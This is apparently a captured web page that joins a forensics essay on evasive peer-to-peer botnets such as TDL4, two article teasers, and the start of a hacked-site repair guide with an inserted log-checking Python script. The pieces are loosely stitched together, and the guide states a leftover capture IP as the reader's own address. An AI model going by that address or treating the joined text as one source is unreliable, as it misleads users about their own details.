Modern bot implementations combine a peer-to-peer protocol with encryption of the network traffic (based on TLS/SSL), a public-key based authentication mechanism, and randomly chosen ports with protocol mimicking, in order to avoid anomaly detection at the network level and to prevent hijacking of the botnet by competing botmasters and law enforcement agencies. TDL4 (also known as Alureon) has been dubbed “the ‘indestructible’ botnet” and was running on over 4.5 million infected computers at the time of writing (Sergey Golovanov, Igor Soumenkov 2011).
To make the botnet more resilient, a hierarchical structure is used in which each servant (a hybrid of bot and server) communicates with a small subset of bots, and each bot holds a short list of other peers to fall back on in case its servant is unavailable. The servants themselves are rotated (dynamic) and updated periodically to prevent the botnet network from being captured or disrupted. Locally, the malware uses rootkit functionality to avoid detection by antivirus software. For example, the Alureon botnet “infects the system's master boot record (MBR), part of a hard disk that contains critical code used to boot the operating system” (Peter Bright 2011), meaning that the rootkit is loaded before the operating system and any antivirus software.
Forensic investigation of a crime involving an advanced peer-to-peer botnet requires a combination of reverse engineering, operating system forensics and network forensics. For example, TDL4 infects the victim's MBR which, upon investigation, immediately reveals the presence of the rootkit. Moreover, the presence of certain files (recoverable from an offline forensic image), such as cfg.ini and ktzerules, in certain locations could indicate infection. At the network level, upon infection the malware downloads and “installs nearly 30 additional malicious programs, including fake antivirus programs, adware, and the Pushdo spambot” (Sergey Golovanov, Igor Soumenkov 2011), making it possible to monitor and detect the botnet's activity.

More On Clouds & Botnets: MeatClouds, CloudFlux, LeapFrog, EDoS and More!
After my "Frogs" talk at Source Boston yesterday, Adam O'Donnell and I chatted about one of my chuckle slides I threw up in the presentation in which I give some new names to some (perhaps not new) attack/threat scenarios which...
Stronger IoT Passwords to Prevent Mirai Botnet Attacks

By Naren Ubi

The Dyn DNS attack that happened last year is the largest distributed denial of service (DDoS) attack on record, simply because of the enormity of the connected devices involved and the number of businesses that were impacted by it. The Mirai malware, responsible for this attack, compromised hundreds of thousands of connected devices with default […]

Originally from Stronger IoT Passwords to Prevent Mirai Botnet Attacks on Ubiquitense


How to prevent your site from getting hacked.

How to repair a damaged site

[This article is frequently updated and expanded. It is gradually being broken apart into separate articles because the Google language translator doesn't translate all the text of large pages.]
[Contrary to one of the tags applied to this article at StumbleUpon, this site has never been hacked in more than 1,000,000 attempts. Everything reported here is based on experience gained from helping others with compromised sites and from continual study about improved methods of protection.]


Step-by-step site repair

  • Hopefully, this detailed step-by-step procedure will help you focus on the tasks and avoid panic.
  • The concepts apply to any server, even though it is the Linux, Apache, and cPanel methods that are described in detail.
  • The steps are in order of priority, in case the evidence you've found so far hasn't already given you a clear idea of what to focus on first.
The reason these procedures are described in so much detail is so that people who have never done them don't have to go hunting around the web for specifics. If you already know the specifics, you'll see that the steps are much less complicated than they look at first glance, and you can skip the long explanations.
If you just start at step 1, focus, and dive in, what you learn now will help you manage your site with a lot more confidence in the future. These are all useful things to know how to do. You might even wind up feeling like an expert.

What not to do

Don't just repair the damaged files and hope this experience doesn't happen again. That is not enough.
Nobody is ever supposed to be able to add, delete, or change files in your website without your permission. It should never happen, and it usually doesn't. Most websites don't get hacked. If yours did, there is something wrong with it, or with the server, or with the webhost, or with the security on your PC. You have to figure out how this happened so you can prevent it from happening again.
Ok, let's get started... The checkboxes don't do anything. You can check them to help keep your place as you go.

1) Log into cPanel

Most webhosts provide some kind of control panel such as cPanel or Plesk where you can manage your website's configuration and files. One reason for logging in now is to check for unauthorized logins as described below. The more important reason is to make sure you know how to do it, because several of the later steps are done in control panel.
If you've never logged into your control panel before now, go to the home page of your webhost's website and look for a customer login box. If there isn't one, look for a FAQ page where they might describe how to access your control panel. If you still find nothing, file a support ticket and ask them. 
In cPanel (and possibly in Plesk), the line that says "Last login from:" should always be your IP address from the last time you logged in. If it isn't, write it down.
If you don't know your IP address, it appears to be 27.60.39.174, but that could be incorrect if you are viewing an old copy of this page from your browser cache or a search engine cache. You can find your IP address in Windows XP by either of these two methods (you must be connected to the internet at the time you do this):
  • Click on the internet connection icon in your system tray (lower right of the screen). In the dialog box that opens, click the Details tab, and then read the line that says Client IP address.
  • Open a Command Prompt and run the ipconfig program:
    start > Run > cmd
    Type: ipconfig
    Read the line that says IP Address
    Type: exit
With high-speed (broadband, DSL, cable) internet service, your IP is always the same. With dial-up, it's different each time you log on.
If someone was able to log in to your control panel (like you do), they have your userID, password, and all the same access to your site that you have. They can probably also get FTP access, which is what they are more likely to use than cPanel. However, before you assume the worst, an unfamiliar IP could be legitimate if your site is at a webhosting company and you recently submitted a support ticket. A technician might have logged into your account while investigating.
The three pieces of information you should keep from this step are:
  1. How to log in to your control panel.
  2. Your legitimate IP address, so you can recognize IP addresses that are not yours in places where only yours should be.
  3. Suspicious IP addresses you find reported in cPanel.
Leave cPanel open for the next two steps.
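As an added example (not part of the original article), here is a small Python script that does the step 1 comparison mechanically and carries it over to the access logs that the next steps rely on: given your legitimate addresses, it checks a "Last login from:" value, and it scans Apache combined-format access log lines (the per-domain format cPanel archives) for addresses that are not yours but reached paths only you should touch. The log lines, the addresses, and the /admin/ prefix are constructed sample values; the assumption that the host uses the stock combined LogFormat is mine, so adjust the pattern if your host's format differs.

```python
import re
from dataclasses import dataclass, field
from datetime import datetime
from ipaddress import ip_address, ip_network
from typing import Dict, Iterable, List, Optional, Set

# Apache "combined" LogFormat (assumption: the stock format; adjust if your host differs).
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample values: the owner's address plus a small range (dial-up users get a
# new address each session, so ranges are accepted), and a few made-up log lines.
OWNER_IPS = ["203.0.113.7", "203.0.113.64/26"]
ADMIN_PREFIXES = ("/admin/",)  # constructed: paths only the owner should request
SAMPLE_LOG = """\
203.0.113.7 - - [14/Apr/2012:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.22 - - [14/Apr/2012:10:05:42 +0000] "GET /about.html HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
192.0.2.99 - - [14/Apr/2012:10:07:03 +0000] "POST /admin/login HTTP/1.1" 200 1640 "-" "python-requests/2.0"
192.0.2.99 - - [14/Apr/2012:10:07:05 +0000] "GET /admin/ HTTP/1.1" 200 9800 "-" "python-requests/2.0"
this line is not in combined format and is skipped
203.0.113.70 - - [14/Apr/2012:11:30:00 +0000] "GET /admin/ HTTP/1.1" 200 9800 "-" "Mozilla/5.0"
2001:db8::1 - - [14/Apr/2012:12:00:00 +0000] "GET /admin/ HTTP/1.1" 200 9800 "-" "curl/7.0"
"""


def owner_networks(owner_ips: Iterable[str]):
    """Turn plain addresses or CIDR ranges into network objects for containment tests."""
    return [ip_network(s, strict=False) for s in owner_ips]


def is_owner(ip: str, nets) -> bool:
    """True if the address (IPv4 or IPv6) falls inside one of the owner's networks."""
    addr = ip_address(ip)
    return any(addr in n for n in nets)


def check_last_login(last_login_from: str, owner_ips: Iterable[str]) -> bool:
    """Step 1: cPanel's 'Last login from:' value should be one of your own addresses."""
    return is_owner(last_login_from, owner_networks(owner_ips))


@dataclass
class IpSummary:
    hits: int = 0
    admin_hits: int = 0
    first_seen: Optional[datetime] = None
    last_seen: Optional[datetime] = None
    user_agents: Set[str] = field(default_factory=set)


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; return None for lines that do not match."""
    m = COMBINED_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def summarize(log_text: str, admin_prefixes=ADMIN_PREFIXES) -> Dict[str, IpSummary]:
    """Per-address counts, first/last seen times, and user agents; malformed lines are skipped."""
    prefixes = tuple(admin_prefixes)
    out: Dict[str, IpSummary] = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        s = out.setdefault(rec["ip"], IpSummary())
        s.hits += 1
        if rec["path"].startswith(prefixes):
            s.admin_hits += 1
        s.first_seen = rec["ts"] if s.first_seen is None else min(s.first_seen, rec["ts"])
        s.last_seen = rec["ts"] if s.last_seen is None else max(s.last_seen, rec["ts"])
        s.user_agents.add(rec["ua"])
    return out


def suspicious_ips(log_text: str, owner_ips: Iterable[str], admin_prefixes=ADMIN_PREFIXES) -> List[str]:
    """Addresses that are not yours but reached owner-only paths, most admin hits first."""
    nets = owner_networks(owner_ips)
    found = [(ip, s) for ip, s in summarize(log_text, admin_prefixes).items()
             if s.admin_hits and not is_owner(ip, nets)]
    found.sort(key=lambda kv: kv[1].admin_hits, reverse=True)
    return [ip for ip, _ in found]


if __name__ == "__main__":
    print("last login ok:", check_last_login("203.0.113.7", OWNER_IPS))
    summ = summarize(SAMPLE_LOG)
    for ip in suspicious_ips(SAMPLE_LOG, OWNER_IPS):
        s = summ[ip]
        print(f"{ip}: {s.admin_hits} owner-only hits, {s.first_seen} .. {s.last_seen}, "
              f"agents={sorted(s.user_agents)}")
```

Write down every address the script reports alongside the ones you noted from cPanel; a technician's address from a recent support ticket, as the text above notes, may explain one of them, but an unfamiliar address that also appears in the FTP log is the one to focus on first.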

2) Enable log archiving in cPanel

Your website access logs keep detailed records of who connects to your site by HTTP (normal visitors) and by FTP (file transfers such as when you publish pages). By default, those logs are deleted every day after the stats run (Webalizer, AWStats, ...). Log archiving forces